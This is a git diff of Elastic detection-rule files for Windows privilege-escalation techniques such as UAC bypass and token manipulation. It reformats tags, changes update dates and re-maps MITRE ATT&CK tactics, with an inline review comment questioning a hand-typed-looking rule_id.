+id = "T1078"
+name = "Valid Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/"
+[[rule.threat.technique.subtechnique]]
+id = "T1078.002"
+name = "Domain Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/002/"
+
+
 [rule.threat.tactic]
 id = "TA0004"
 name = "Privilege Escalation"
 reference = "https://attack.mitre.org/tactics/TA0004/"
+
diff --git a/rules/windows/privilege_escalation_takeover_new_source_ip.toml b/rules/windows/privilege_escalation_takeover_new_source_ip.toml
index e072fc82581..dc2dae8d80a 100644
--- a/rules/windows/privilege_escalation_takeover_new_source_ip.toml
+++ b/rules/windows/privilege_escalation_takeover_new_source_ip.toml
@@ -2,7 +2,7 @@
 creation_date = "2026/02/25"
 integration = ["system", "windows"]
 maturity = "production"
-updated_date = "2026/03/24"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -43,7 +43,14 @@ references = ["https://attack.mitre.org/techniques/T1078/"]
 risk_score = 47
 rule_id = "a1b2c3d4-e5f6-4a5b-8c9d-0e1f2a3b4c5d"
 severity = "medium"
-tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Initial Access", "Tactic: Lateral Movement", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Windows",
+ "Use Case: Threat Detection",
+ "Tactic: Privilege Escalation",
+ "Data Source: Windows Security Event Logs",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "esql"
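Review bot: `rule_id = "a1b2c3d4-e5f6-4a5b-8c9d-0e1f2a3b4c5d"` in privilege_escalation_takeover_new_source_ip.toml (a context line in the `@@ -43,7 +43,14 @@` hunk) reads like a hand-typed sequential value rather than a generated UUID, and the rule is recent (`creation_date = "2026/02/25"`). rule_id is the stable identity under which a detection rule is installed and later updated, so a placeholder that is replaced afterwards, or that collides with another hand-typed id, leaves consumers with duplicate or orphaned rules. Worth confirming while this file is being edited that the id is intentional and unique across the rule set; if it is not, generating a fresh UUID now is far cheaper than after the rule has shipped.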
@@ -69,26 +76,14 @@ from logs-system.security*, logs-windows.forwarded*, winlogbeat-* metadata _id,
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1078"
 name = "Valid Accounts"
 reference = "https://attack.mitre.org/techniques/T1078/"
-[rule.threat.tactic]
-id = "TA0001"
-name = "Initial Access"
-reference = "https://attack.mitre.org/tactics/TA0001/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1021"
-name = "Remote Services"
-reference = "https://attack.mitre.org/techniques/T1021/"
 [rule.threat.tactic]
-id = "TA0008"
-name = "Lateral Movement"
-reference = "https://attack.mitre.org/tactics/TA0008/"
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
+
diff --git a/rules/windows/privilege_escalation_thread_cpu_priority_hijack.toml b/rules/windows/privilege_escalation_thread_cpu_priority_hijack.toml
index 72e8665edce..2e44d0cbfe5 100644
--- a/rules/windows/privilege_escalation_thread_cpu_priority_hijack.toml
+++ b/rules/windows/privilege_escalation_thread_cpu_priority_hijack.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/09/25"
 integration = ["system", "windows"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/11/14"
 [rule]
 author = ["Elastic"]
@@ -79,3 +79,16 @@ winlog.event_data.AccessMask:"512" and not winlog.event_data.SubjectUserSid:("S-
 '''
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1134"
+name = "Access Token Manipulation"
+reference = "https://attack.mitre.org/techniques/T1134/"
+
+
+[rule.threat.tactic]
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
+
diff --git a/rules/windows/privilege_escalation_tokenmanip_sedebugpriv_enabled.toml b/rules/windows/privilege_escalation_tokenmanip_sedebugpriv_enabled.toml
index 09fe973b8d6..1ca881499f0 100644
--- a/rules/windows/privilege_escalation_tokenmanip_sedebugpriv_enabled.toml
+++ b/rules/windows/privilege_escalation_tokenmanip_sedebugpriv_enabled.toml
@@ -2,7 +2,7 @@
 creation_date = "2022/10/20"
 integration = ["windows", "system"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/12/01"
 [rule]
 author = ["Elastic"]
@@ -75,7 +75,14 @@ Token Right Adjusted Events (Success)
 ```
 """
 severity = "medium"
-tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Windows",
+ "Use Case: Threat Detection",
+ "Tactic: Privilege Escalation",
+ "Data Source: Windows Security Event Logs",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "eql"
@@ -113,26 +120,14 @@ any where host.os.type == "windows" and event.provider: "Microsoft-Windows-Secur
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1134"
 name = "Access Token Manipulation"
 reference = "https://attack.mitre.org/techniques/T1134/"
-[rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1134"
-name = "Access Token Manipulation"
-reference = "https://attack.mitre.org/techniques/T1134/"
 [rule.threat.tactic]
 id = "TA0004"
 name = "Privilege Escalation"
 reference = "https://attack.mitre.org/tactics/TA0004/"
+
diff --git a/rules/windows/privilege_escalation_uac_bypass_com_clipup.toml b/rules/windows/privilege_escalation_uac_bypass_com_clipup.toml
index 4d2045a1f8c..4f92ccdc7c3 100644
--- a/rules/windows/privilege_escalation_uac_bypass_com_clipup.toml
+++ b/rules/windows/privilege_escalation_uac_bypass_com_clipup.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/10/28"
 integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/03/20"
 [rule]
 author = ["Elastic"]
@@ -88,54 +88,53 @@ process where host.os.type == "windows" and event.type == "start" and process.na
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1548"
 name = "Abuse Elevation Control Mechanism"
 reference = "https://attack.mitre.org/techniques/T1548/"
+[[rule.threat.technique.subtechnique]]
+id = "T1548.002"
+name = "Bypass User Account Control"
+reference = "https://attack.mitre.org/techniques/T1548/002/"
+
+
+[rule.threat.tactic]
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1548"
+name = "Abuse Elevation Control Mechanism"
+reference = "https://attack.mitre.org/techniques/T1548/"
 [[rule.threat.technique.subtechnique]]
 id = "T1548.002"
 name = "Bypass User Account Control"
 reference = "https://attack.mitre.org/techniques/T1548/002/"
+
+
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
-
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1559"
 name = "Inter-Process Communication"
 reference = "https://attack.mitre.org/techniques/T1559/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1559.001"
 name = "Component Object Model"
 reference = "https://attack.mitre.org/techniques/T1559/001/"
+
+
 [rule.threat.tactic]
 id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1548"
-name = "Abuse Elevation Control Mechanism"
-reference = "https://attack.mitre.org/techniques/T1548/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1548.002"
-name = "Bypass User Account Control"
-reference = "https://attack.mitre.org/techniques/T1548/002/"
-
-[rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
diff --git a/rules/windows/privilege_escalation_uac_bypass_com_ieinstal.toml b/rules/windows/privilege_escalation_uac_bypass_com_ieinstal.toml
index 3120f529e85..97b2898d655 100644
--- a/rules/windows/privilege_escalation_uac_bypass_com_ieinstal.toml
+++ b/rules/windows/privilege_escalation_uac_bypass_com_ieinstal.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/11/03"
 integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/03/20"
 [rule]
 author = ["Elastic"]
@@ -62,7 +62,20 @@ references = ["https://swapcontext.blogspot.com/2020/11/uac-bypasses-from-comaut
 risk_score = 47
 rule_id = "fc7c0fa4-8f03-4b3e-8336-c5feab0be022"
 severity = "medium"
-tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Windows",
+ "Use Case: Threat Detection",
+ "Tactic: Privilege Escalation",
+ "Tactic: Defense Evasion",
+ "Tactic: Execution",
+ "Data Source: Elastic Endgame",
+ "Data Source: Elastic Defend",
+ "Data Source: Sysmon",
+ "Data Source: Microsoft Defender for Endpoint",
+ "Data Source: SentinelOne",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "eql"
@@ -78,36 +91,53 @@ process where host.os.type == "windows" and event.type == "start" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1548"
 name = "Abuse Elevation Control Mechanism"
 reference = "https://attack.mitre.org/techniques/T1548/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1548.002"
 name = "Bypass User Account Control"
 reference = "https://attack.mitre.org/techniques/T1548/002/"
-[rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
+
+[rule.threat.tactic]
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1548"
 name = "Abuse Elevation Control Mechanism"
 reference = "https://attack.mitre.org/techniques/T1548/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1548.002"
 name = "Bypass User Account Control"
 reference = "https://attack.mitre.org/techniques/T1548/002/"
+
+
 [rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1559"
+name = "Inter-Process Communication"
+reference = "https://attack.mitre.org/techniques/T1559/"
+[[rule.threat.technique.subtechnique]]
+id = "T1559.001"
+name = "Component Object Model"
+reference = "https://attack.mitre.org/techniques/T1559/001/"
+
+
+
+[rule.threat.tactic]
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
+
diff --git a/rules/windows/privilege_escalation_uac_bypass_com_interface_icmluautil.toml b/rules/windows/privilege_escalation_uac_bypass_com_interface_icmluautil.toml
index beff616928a..cc5a3e44aa3 100644
--- a/rules/windows/privilege_escalation_uac_bypass_com_interface_icmluautil.toml
+++ b/rules/windows/privilege_escalation_uac_bypass_com_interface_icmluautil.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/10/19"
 integration = ["endpoint", "windows", "m365_defender"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/03/20"
 [rule]
 author = ["Elastic"]
@@ -59,7 +59,19 @@ The ICMLuaUtil Elevated COM Interface is a Windows component that facilitates Us
 risk_score = 73
 rule_id = "68d56fdc-7ffa-4419-8e95-81641bd6f845"
 severity = "high"
-tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Resources: Investigation Guide"]
+tags = [
+    "Domain: Endpoint",
+    "OS: Windows",
+    "Use Case: Threat Detection",
+    "Tactic: Privilege Escalation",
+    "Tactic: Defense Evasion",
+    "Tactic: Execution",
+    "Data Source: Elastic Endgame",
+    "Data Source: Elastic Defend",
+    "Data Source: Sysmon",
+    "Data Source: Microsoft Defender for Endpoint",
+    "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "eql"
@@ -73,36 +85,53 @@ process where host.os.type == "windows" and event.type == "start" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1548"
 name = "Abuse Elevation Control Mechanism"
 reference = "https://attack.mitre.org/techniques/T1548/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1548.002"
 name = "Bypass User Account Control"
 reference = "https://attack.mitre.org/techniques/T1548/002/"
-[rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
+
+[rule.threat.tactic]
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1548"
 name = "Abuse Elevation Control Mechanism"
 reference = "https://attack.mitre.org/techniques/T1548/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1548.002"
 name = "Bypass User Account Control"
 reference = "https://attack.mitre.org/techniques/T1548/002/"
+
+
 [rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1559"
+name = "Inter-Process Communication"
+reference = "https://attack.mitre.org/techniques/T1559/"
+[[rule.threat.technique.subtechnique]]
+id = "T1559.001"
+name = "Component Object Model"
+reference = "https://attack.mitre.org/techniques/T1559/001/"
+
+
+
+[rule.threat.tactic]
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
+
diff --git a/rules/windows/privilege_escalation_uac_bypass_diskcleanup_hijack.toml b/rules/windows/privilege_escalation_uac_bypass_diskcleanup_hijack.toml
index b02c911f5c6..8763bfd5251 100644
--- a/rules/windows/privilege_escalation_uac_bypass_diskcleanup_hijack.toml
+++ b/rules/windows/privilege_escalation_uac_bypass_diskcleanup_hijack.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/08/18"
 integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/08/28"
 [rule]
 author = ["Elastic"]
@@ -64,7 +64,22 @@ User Account Control (UAC) is a security feature in Windows that helps prevent u
 risk_score = 47
 rule_id = "1dcc51f6-ba26-49e7-9ef4-2655abb2361e"
 severity = "medium"
-tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"]
+tags = [
+    "Domain: Endpoint",
+    "OS: Windows",
+    "Use Case: Threat Detection",
+    "Tactic: Privilege Escalation",
+    "Tactic: Defense Evasion",
+    "Tactic: Execution",
+    "Data Source: Elastic Endgame",
+    "Data Source: Elastic Defend",
+    "Data Source: Windows Security Event Logs",
+    "Data Source: Microsoft Defender for Endpoint",
+    "Data Source: Sysmon",
+    "Data Source: SentinelOne",
+    "Data Source: Crowdstrike",
+    "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "eql"
@@ -86,36 +101,53 @@ process where host.os.type == "windows" and event.type == "start" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1548"
 name = "Abuse Elevation Control Mechanism"
 reference = "https://attack.mitre.org/techniques/T1548/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1548.002"
 name = "Bypass User Account Control"
 reference = "https://attack.mitre.org/techniques/T1548/002/"
-[rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
+
+[rule.threat.tactic]
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1548"
 name = "Abuse Elevation Control Mechanism"
 reference = "https://attack.mitre.org/techniques/T1548/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1548.002"
 name = "Bypass User Account Control"
 reference = "https://attack.mitre.org/techniques/T1548/002/"
+
+
 [rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1053"
+name = "Scheduled Task/Job"
+reference = "https://attack.mitre.org/techniques/T1053/"
+[[rule.threat.technique.subtechnique]]
+id = "T1053.005"
+name = "Scheduled Task"
+reference = "https://attack.mitre.org/techniques/T1053/005/"
+
+
+
+[rule.threat.tactic]
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
+
diff --git a/rules/windows/privilege_escalation_uac_bypass_dll_sideloading.toml b/rules/windows/privilege_escalation_uac_bypass_dll_sideloading.toml
index 993c7e84c77..db0e8042ad4 100644
--- a/rules/windows/privilege_escalation_uac_bypass_dll_sideloading.toml
+++ b/rules/windows/privilege_escalation_uac_bypass_dll_sideloading.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/10/27"
 integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/09/01"
 [rule]
 author = ["Elastic"]
@@ -92,46 +92,46 @@ file where host.os.type == "windows" and event.type : "change" and process.name
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1548"
 name = "Abuse Elevation Control Mechanism"
 reference = "https://attack.mitre.org/techniques/T1548/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1548.002"
 name = "Bypass User Account Control"
 reference = "https://attack.mitre.org/techniques/T1548/002/"
-[[rule.threat.technique]]
-id = "T1574"
-name = "Hijack Execution Flow"
-reference = "https://attack.mitre.org/techniques/T1574/"
-[[rule.threat.technique.subtechnique]]
-id = "T1574.001"
-name = "DLL"
-reference = "https://attack.mitre.org/techniques/T1574/001/"
 [rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
-
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1548"
 name = "Abuse Elevation Control Mechanism"
 reference = "https://attack.mitre.org/techniques/T1548/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1548.002"
 name = "Bypass User Account Control"
 reference = "https://attack.mitre.org/techniques/T1548/002/"
+
+[[rule.threat.technique]]
+id = "T1574"
+name = "Hijack Execution Flow"
+reference = "https://attack.mitre.org/techniques/T1574/"
+[[rule.threat.technique.subtechnique]]
+id = "T1574.001"
+name = "DLL"
+reference = "https://attack.mitre.org/techniques/T1574/001/"
+
+
+
 [rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
+
diff --git a/rules/windows/privilege_escalation_uac_bypass_event_viewer.toml b/rules/windows/privilege_escalation_uac_bypass_event_viewer.toml
index 96e8ff9eab2..c9cd1c4a1bb 100644
--- a/rules/windows/privilege_escalation_uac_bypass_event_viewer.toml
+++ b/rules/windows/privilege_escalation_uac_bypass_event_viewer.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/03/17"
 integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/09/11"
 [transform]
 [[transform.osquery]]
@@ -144,36 +144,36 @@ process where host.os.type == "windows" and event.type == "start" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1548"
 name = "Abuse Elevation Control Mechanism"
 reference = "https://attack.mitre.org/techniques/T1548/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1548.002"
 name = "Bypass User Account Control"
 reference = "https://attack.mitre.org/techniques/T1548/002/"
-[rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
+
+[rule.threat.tactic]
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1548"
 name = "Abuse Elevation Control Mechanism"
 reference = "https://attack.mitre.org/techniques/T1548/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1548.002"
 name = "Bypass User Account Control"
 reference = "https://attack.mitre.org/techniques/T1548/002/"
+
+
 [rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
+
diff --git a/rules/windows/privilege_escalation_uac_bypass_mock_windir.toml b/rules/windows/privilege_escalation_uac_bypass_mock_windir.toml
index 3edafaea26b..8752086e4ee 100644
--- a/rules/windows/privilege_escalation_uac_bypass_mock_windir.toml
+++ b/rules/windows/privilege_escalation_uac_bypass_mock_windir.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/10/26"
 integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/05/05"
 [transform]
 [[transform.osquery]]
@@ -134,46 +134,46 @@ process where host.os.type == "windows" and event.type == "start" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1548"
+name = "Abuse Elevation Control Mechanism"
+reference = "https://attack.mitre.org/techniques/T1548/"
+[[rule.threat.technique.subtechnique]]
+id = "T1548.002"
+name = "Bypass User Account Control"
+reference = "https://attack.mitre.org/techniques/T1548/002/"
+
+
+[rule.threat.tactic]
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
 id = "T1036"
 name = "Masquerading"
 reference = "https://attack.mitre.org/techniques/T1036/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1036.005"
 name = "Match Legitimate Resource Name or Location"
 reference = "https://attack.mitre.org/techniques/T1036/005/"
+
 [[rule.threat.technique]]
 id = "T1548"
 name = "Abuse Elevation Control Mechanism"
 reference = "https://attack.mitre.org/techniques/T1548/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1548.002"
 name = "Bypass User Account Control"
 reference = "https://attack.mitre.org/techniques/T1548/002/"
+
+
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1548"
-name = "Abuse Elevation Control Mechanism"
-reference = "https://attack.mitre.org/techniques/T1548/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1548.002"
-name = "Bypass User Account Control"
-reference = "https://attack.mitre.org/techniques/T1548/002/"
-
-[rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
diff --git a/rules/windows/privilege_escalation_uac_bypass_winfw_mmc_hijack.toml b/rules/windows/privilege_escalation_uac_bypass_winfw_mmc_hijack.toml
index 92ec3ed3c71..fa2fd7c192b 100644
--- a/rules/windows/privilege_escalation_uac_bypass_winfw_mmc_hijack.toml
+++ b/rules/windows/privilege_escalation_uac_bypass_winfw_mmc_hijack.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/10/14"
 integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/03/20"
 [transform]
 [[transform.osquery]]
@@ -132,46 +132,46 @@ process where host.os.type == "windows" and event.type == "start" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1548"
+name = "Abuse Elevation Control Mechanism"
+reference = "https://attack.mitre.org/techniques/T1548/"
+[[rule.threat.technique.subtechnique]]
+id = "T1548.002"
+name = "Bypass User Account Control"
+reference = "https://attack.mitre.org/techniques/T1548/002/"
+
+
+[rule.threat.tactic]
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
 id = "T1218"
 name = "System Binary Proxy Execution"
 reference = "https://attack.mitre.org/techniques/T1218/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1218.014"
 name = "MMC"
 reference = "https://attack.mitre.org/techniques/T1218/014/"
+
 [[rule.threat.technique]]
 id = "T1548"
 name = "Abuse Elevation Control Mechanism"
 reference = "https://attack.mitre.org/techniques/T1548/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1548.002"
 name = "Bypass User Account Control"
 reference = "https://attack.mitre.org/techniques/T1548/002/"
+
+
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1548"
-name = "Abuse Elevation Control Mechanism"
-reference = "https://attack.mitre.org/techniques/T1548/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1548.002"
-name = "Bypass User Account Control"
-reference = "https://attack.mitre.org/techniques/T1548/002/"
-
-[rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
diff --git a/rules/windows/privilege_escalation_unusual_parentchild_relationship.toml b/rules/windows/privilege_escalation_unusual_parentchild_relationship.toml
index 1475fa06cf2..4a8e99f0049 100644
--- a/rules/windows/privilege_escalation_unusual_parentchild_relationship.toml
+++ b/rules/windows/privilege_escalation_unusual_parentchild_relationship.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/02/18"
 integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/06/05"
 [transform]
 [[transform.osquery]]
@@ -109,7 +109,20 @@ references = [
 risk_score = 47
 rule_id = "35df0dd8-092d-4a83-88c1-5151a804f31b"
 severity = "medium"
-tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike"]
+tags = [
+    "Domain: Endpoint",
+    "OS: Windows",
+    "Use Case: Threat Detection",
+    "Tactic: Privilege Escalation",
+    "Resources: Investigation Guide",
+    "Data Source: Elastic Endgame",
+    "Data Source: Elastic Defend",
+    "Data Source: Windows Security Event Logs",
+    "Data Source: Microsoft Defender for Endpoint",
+    "Data Source: Sysmon",
+    "Data Source: SentinelOne",
+    "Data Source: Crowdstrike",
+]
 timestamp_override = "event.ingested"
 type = "eql"
@@ -149,18 +162,19 @@ process.parent.name != null and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
-id = "T1036"
-name = "Masquerading"
-reference = "https://attack.mitre.org/techniques/T1036/"
-
+id = "T1055"
+name = "Process Injection"
+reference = "https://attack.mitre.org/techniques/T1055/"
 [[rule.threat.technique.subtechnique]]
-id = "T1036.009"
-name = "Break Process Trees"
-reference = "https://attack.mitre.org/techniques/T1036/009/"
+id = "T1055.012"
+name = "Process Hollowing"
+reference = "https://attack.mitre.org/techniques/T1055/012/"
+
+
 [rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
+
diff --git a/rules/windows/privilege_escalation_unusual_svchost_childproc_childless.toml b/rules/windows/privilege_escalation_unusual_svchost_childproc_childless.toml
index a2222b42bc5..5205c3c67f0 100644
